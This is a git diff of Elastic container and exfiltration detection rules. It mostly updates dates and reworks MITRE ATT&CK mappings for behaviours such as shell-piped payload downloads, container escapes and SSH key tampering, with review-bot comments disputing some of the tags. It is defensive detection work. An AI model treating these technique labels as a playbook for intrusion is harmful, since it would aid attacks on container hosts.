 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1095"
+name = "Non-Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1095/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1048"
+name = "Exfiltration Over Alternative Protocol"
+reference = "https://attack.mitre.org/techniques/T1048/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1048.003"
+name = "Exfiltration Over Unencrypted Non-C2 Protocol"
+reference = "https://attack.mitre.org/techniques/T1048/003/"
+
+[rule.threat.tactic]
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
diff --git a/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml b/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml
index 929a3fbb945..de03d834e18 100644
--- a/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml
+++ b/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/05"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -99,11 +99,6 @@ sequence by process.parent.entity_id, container.id with maxspan=1s
 [[rule.threat]]
 framework = "MITRE ATT&CK"

-[rule.threat.tactic]
-name = "Execution"
-id = "TA0002"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -114,23 +109,38 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" [rule.threat.tactic] -name = "Command and Control" -id = "TA0011" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -name = "Application Layer Protocol" id = "T1071" +name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" [rule.threat.tactic] -name = "Defense Evasion" id = "TA0005" +name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml b/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml index 1e80e6c6c4e..579b60c02b9 100644 --- a/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml +++ b/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -105,3 +105,16 @@ reference = "https://attack.mitre.org/techniques/T1613/"
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
diff --git a/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml b/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml
index 37ebcaa3c19..4b08510e3c8 100644
--- a/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml
+++ b/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/05"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -122,3 +122,21 @@ reference = "https://attack.mitre.org/techniques/T1222/002/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1548.001"
+name = "Setuid and Setgid"
+reference = "https://attack.mitre.org/techniques/T1548/001/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
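Review bot: T1548.001 (Setuid and Setgid) only applies when the chmod sets the setuid/setgid bits (`u+s`, `g+s`, or a leading `4`/`2` in an octal mode), but this rule per its filename matches a file being made executable, and its query is not in the hunk, so whether it checks for those bits is not visible. If the query only matches `+x`/`755`-style changes, the new Privilege Escalation entry overstates what the rule detects and will mis-tag every alert it produces; either gate it on a setuid/setgid arm of the query or drop the TA0004 block. The T1021 / Lateral Movement entry added to the kubelet-access rule earlier in this hunk group is a reasonable fit for a container reaching the node's kubelet API.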
diff --git a/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml b/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml index 674f355202d..d677ad19712 100644 --- a/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml +++ b/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -117,45 +117,63 @@ process.parent.executable != null and ( [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" - [[rule.threat.technique.subtechnique]] - name = "Python" - id = "T1059.006" - reference = "https://attack.mitre.org/techniques/T1059/006/" +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" - [[rule.threat.technique.subtechnique]] - name = "Lua" - id = "T1059.011" - reference = "https://attack.mitre.org/techniques/T1059/011/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference 
= "https://attack.mitre.org/techniques/T1071/001/" - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/execution_tool_installation.toml b/rules/integrations/cloud_defend/execution_tool_installation.toml index ad87e634195..a5a4dec9515 100644 --- a/rules/integrations/cloud_defend/execution_tool_installation.toml +++ b/rules/integrations/cloud_defend/execution_tool_installation.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -98,3 +98,16 @@ reference = "https://attack.mitre.org/techniques/T1072/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" 
diff --git a/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml b/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml index f2710c97edc..7bbd64a8f65 100644 --- a/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml +++ b/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -116,24 +116,39 @@ not process.name in ("apt", "apt-get", "dnf", "microdnf", "yum", "zypper", "tdnf framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.002" +name = "At" +reference = "https://attack.mitre.org/techniques/T1053/002/" + [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique.subtechnique]] +id = "T1053.006" +name = "Systemd Timers" +reference = "https://attack.mitre.org/techniques/T1053/006/" + [[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" [[rule.threat.technique]] id = "T1546" 
@@ -153,21 +168,36 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.002" +name = "At" +reference = "https://attack.mitre.org/techniques/T1053/002/" + [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique.subtechnique]] +id = "T1053.006" +name = "Systemd Timers" +reference = "https://attack.mitre.org/techniques/T1053/006/" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.002" +name = "Systemd Service" +reference = "https://attack.mitre.org/techniques/T1543/002/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" @@ -191,11 +221,21 @@ id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.002" +name = "At" +reference = "https://attack.mitre.org/techniques/T1053/002/" + [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique.subtechnique]] +id = "T1053.006" +name = "Systemd Timers" +reference = "https://attack.mitre.org/techniques/T1053/006/" + [rule.threat.tactic] id = "TA0002" name = "Execution" 
diff --git a/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml b/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml index a177a35115c..3da9b6ce39b 100644 --- a/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml +++ b/rules/integrations/cloud_defend/persistence_ssh_authorized_keys_modification_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,3 +122,21 @@ reference = "https://attack.mitre.org/techniques/T1563/001/" id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml b/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml index 4e79c7957c8..92639f5d1fc 100644 --- a/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml +++ b/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml 
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/05"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -86,9 +86,9 @@ process.args like (
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
+id = "T1037"
+name = "Boot or Logon Initialization Scripts"
+reference = "https://attack.mitre.org/techniques/T1037/"
 
 [[rule.threat.technique]]
 id = "T1053"
@@ -101,9 +101,24 @@ name = "Cron"
 reference = "https://attack.mitre.org/techniques/T1053/003/"
 
 [[rule.threat.technique]]
-id = "T1037"
-name = "Boot or Logon Initialization Scripts"
-reference = "https://attack.mitre.org/techniques/T1037/"
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.004"
+name = "SSH Authorized Keys"
+reference = "https://attack.mitre.org/techniques/T1098/004/"
+
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1543.004"
+name = "Launch Daemon"
+reference = "https://attack.mitre.org/techniques/T1543/004/"
 
 [[rule.threat.technique]]
 id = "T1546"
@@ -115,6 +130,16 @@ id = "T1546.004"
 name = "Unix Shell Configuration Modification"
 reference = "https://attack.mitre.org/techniques/T1546/004/"
 
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1574.006"
+name = "Dynamic Linker Hijacking"
+reference = "https://attack.mitre.org/techniques/T1574/006/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
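Review bot: T1543.004 (Launch Daemon) is a macOS-only sub-technique — launchd does not exist in a Linux container — so it cannot be what an echo/printf write in a `cloud_defend` rule evidences; the Linux counterpart is T1543.002 (Systemd Service), which this same commit adds to the sibling persistence_modification_of_persistence_relevant_files rule. Replace the sub-technique block under T1543 with `id = "T1543.002"`, `name = "Systemd Service"`, `reference = "https://attack.mitre.org/techniques/T1543/002/"`. The identical T1543.004 block is repeated in the Privilege Escalation entry in the next hunk of this file and needs the same correction.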
@@ -123,11 +148,6 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" @@ -138,6 +158,46 @@ id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" 
@@ -156,7 +216,30 @@ id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml b/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml index eb31c917b85..66be4c56c57 100644 --- a/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml +++ b/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -237,11 +237,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Persistence" -id = "TA0003" -reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat.technique]] id = "T1505" name = "Server Software Component" 
@@ -252,14 +247,14 @@ id = "T1505.003" name = "Web Shell" reference = "https://attack.mitre.org/techniques/T1505/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" 
@@ -270,15 +265,61 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] -name = "Command and Control" id = "TA0011" +name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -name = "Application Layer Protocol" -id = "T1071" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/cloud_defend/privilege_escalation_debugfs_launched_inside_a_privileged_container.toml b/rules/integrations/cloud_defend/privilege_escalation_debugfs_launched_inside_a_privileged_container.toml index de958bb3bd4..8bc0dec0005 100644 
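Review bot: The new Credential Access entry (T1552.001, Credentials In Files) is not supported by anything visible in this hunk: the rule, per its filename and the existing T1505.003 / T1059.004 mapping, fires on a web server spawning a suspicious child process, which is the web-shell execution step rather than a read of credential files. If the query (outside the hunk) matches child commands such as `cat` or `grep` against config or secret paths, document that reasoning in the rule; otherwise drop the TA0006 block so the tactic tags stay aligned with what the alert actually evidences. T1190 / Initial Access is a reasonable precursor mapping for web-shell activity, and grouping T1071, T1095 and T1105 under the single TA0011 entry is the right shape.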
--- a/rules/integrations/cloud_defend/privilege_escalation_debugfs_launched_inside_a_privileged_container.toml +++ b/rules/integrations/cloud_defend/privilege_escalation_debugfs_launched_inside_a_privileged_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,3 +108,16 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1006" +name = "Direct Volume Access" +reference = "https://attack.mitre.org/techniques/T1006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/privilege_escalation_potential_container_escape_via_modified_release_agent_file.toml b/rules/integrations/cloud_defend/privilege_escalation_potential_container_escape_via_modified_release_agent_file.toml index 1542c1df465..4b4422d6871 100644 --- a/rules/integrations/cloud_defend/privilege_escalation_potential_container_escape_via_modified_release_agent_file.toml +++ b/rules/integrations/cloud_defend/privilege_escalation_potential_container_escape_via_modified_release_agent_file.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -91,3 +91,16 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml index ae927878370..5b7dd0fa5c3 100644 --- a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml +++ b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml @@ -3,7 +3,7 @@ creation_date = "2021/06/23" integration = ["cyberarkpas"] maturity = "production" promotion = true -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -53,16 +53,17 @@ event.dataset:cyberarkpas.audit and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" 
@@ -71,3 +72,28 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1555" +name = "Credentials from Password Stores" +reference = "https://attack.mitre.org/techniques/T1555/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml index cd93d27121e..78a1259f568 100644 --- a/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml +++ b/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -89,14 +89,26 @@ Machine learning models analyze network traffic to identify anomalies, such as d - Implement enhanced monitoring on the affected system and network segment to detect any further suspicious activity.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml index 8e885a4b26b..8b7205dff6a 100644 --- a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml +++ b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
